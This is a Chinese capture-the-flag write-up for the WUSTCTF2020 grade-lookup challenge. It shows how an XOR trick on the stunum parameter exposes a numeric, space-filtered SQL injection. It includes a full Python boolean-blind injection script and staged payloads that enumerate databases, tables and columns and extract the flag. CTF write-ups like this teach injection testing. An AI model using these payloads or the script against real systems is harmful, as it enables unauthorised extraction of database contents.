[WUSTCTF2020]颜值成绩查询
首页长这样
通过 GET 参数 stunum 传递查询（学号 → 成绩），形如：
/?stunum=<num>
/?stunum=1
Hi admin, your score is: 100
/?stunum=2
Hi åŒå‡»è€é, your score is: 666
/?stunum=3
Hi 别fuzz了, your score is: ä½ å°±ä¸ä¼šè¾“个å¦å·?
/?stunum=4
Hi 哦数æ®å, your score is: AISæˆå‘˜çš„æ•°æ®
逐渐魔法起来力——后面几条响应是乱码（UTF-8 字节被按 cp1252 显示），大致可解码为 stunum=3 「你就不会输个学号?」、stunum=4 「哦数据…」/「AIS成员的数据」。
这些提示说明 stunum 很可能被直接拼进了数据库查询（字符集没对上才出现乱码），猜测存在 SQL 注入。
/?stunum=0^1
Hi admin, your score is: 100
/?stunum=0^0
student number not exists.
0^1 与 stunum=1 返回完全相同，0^0 则提示不存在：服务端对参数做了算术（MySQL 的按位异或），确认是无需引号的数字型注入。真/假两种响应可区分（假时出现 "not exists"），于是直接布尔盲注。注意 payload 全程不用空格、只靠括号分隔，推测有空格过滤（题面未明确，仅是经验推断）。
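import sys
import time

# Target of this boolean-based blind SQL injection.  Only run this against a
# host you are authorised to test (here: a CTF challenge instance).
URL = "http://xxx.node4.buuoj.cn:81"

# The page answers "student number not exists." when the injected condition
# is false; a true condition returns admin's row ("Hi admin, your score is:
# 100"), which does not contain this marker.  Matching on a substring of the
# error text is deliberately loose but fragile -- adjust if the app changes.
FALSE_MARKER = "exists"

# Pause between requests, in seconds (the original script throttled at 0.1 s).
REQUEST_DELAY = 0.1

# Stage 1 template: every schema name, comma-joined.  Injected as
# stunum=0^(<cond>): MySQL evaluates 0^1 -> 1 (admin's row) and 0^0 -> 0
# (no such row), so any boolean condition becomes a yes/no oracle.
# No spaces are used (parentheses only), presumably to get past a space
# filter -- the challenge does not state this, it is inferred from what works.
FMT_SCHEMAS = (
    "0^(ord(substr((select(group_concat(schema_name))"
    "from(information_schema.schemata)),%d,1))>%d)"
)

# Highest character code the search can resolve.  MySQL's ord() on a
# multi-byte character yields a value above this, so non-ASCII output would
# saturate to chr(127); fine for schema/table/column/flag names here.
MAX_CODE = 127


def remote_oracle(payload: str) -> bool:
    """Send one injected stunum value and report whether the condition held.

    Returns True when the response lacks FALSE_MARKER, i.e. a row came back
    and the injected expression evaluated to 1.  Sleeps REQUEST_DELAY after
    each request so the search does not hammer the target.

    Raises whatever requests raises on network failure or timeout.
    """
    # Imported here so blind_extract() can be imported and tested on a
    # machine without the third-party requests package.
    import requests

    response = requests.get(URL, params={"stunum": payload}, timeout=10)
    time.sleep(REQUEST_DELAY)
    return FALSE_MARKER not in response.text


def blind_extract(fmt: str, is_true, max_len: int = 100, on_char=None) -> str:
    """Recover a string one character at a time through a boolean oracle.

    Args:
        fmt: payload template taking (position, threshold); it must be true
            exactly when ord(substr(<secret>, position, 1)) > threshold.
            Positions are 1-based, as in MySQL's substr() -- the original
            script started at 0, which only ever yields a NUL byte.
        is_true: callable(payload) -> bool, the oracle.
        max_len: upper bound on the number of characters to recover.
        on_char: optional callback receiving each recovered character, used
            to stream progress to the terminal during the slow search.

    Returns:
        The recovered string.  Extraction stops as soon as a position
        resolves to code 0, which is what ord('') gives once substr() runs
        past the end of the secret; the original kept issuing requests for
        all 100 positions.
    """
    chars = []
    for pos in range(1, max_len + 1):
        # Binary search for the smallest code c with ord(ch) <= c, which is
        # ord(ch) itself.  ~7 requests per character instead of up to 127.
        lo, hi = 0, MAX_CODE
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(fmt % (pos, mid)):  # ord(ch) > mid
                lo = mid + 1
            else:                           # ord(ch) <= mid
                hi = mid
        if lo == 0:
            break  # substr() returned '' -> end of the secret
        ch = chr(lo)
        chars.append(ch)
        if on_char is not None:
            on_char(ch)
    return "".join(chars)


def _echo(ch: str) -> None:
    """Print one character immediately so progress is visible while the search runs."""
    print(ch, end="")
    sys.stdout.flush()


def main(fmt: str = FMT_SCHEMAS) -> None:
    """Run one extraction stage against the target and print the result.

    Later stages of the attack substitute another template for `fmt`
    (tables in a schema, columns of a table, the flag itself).
    """
    blind_extract(fmt, remote_oracle, on_char=_echo)
    print()


if __name__ == "__main__":
    main()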
得到库名：information_schema,ctf（只有 ctf 是题目自己的库）
fmt = '0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'ctf\')),%d,1))>%d)'
ctf 库中的表：flag,score
fmt = '0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'flag\')),%d,1))>%d)'
flag 表的列：flag,value
fmt = '0^(ord(substr((select(group_concat(flag))from(ctf.flag)),%d,1))>%d)'
flag 列的内容只是字符串 "flag"，真正的 flag 在 value 列：
fmt = '0^(ord(substr((select(group_concat(value))from(ctf.flag)),%d,1))>%d)'
flag{808357e6-c9d9-48c6-84f8-23e18ec19981}
#Web #SQL注入 #布尔盲注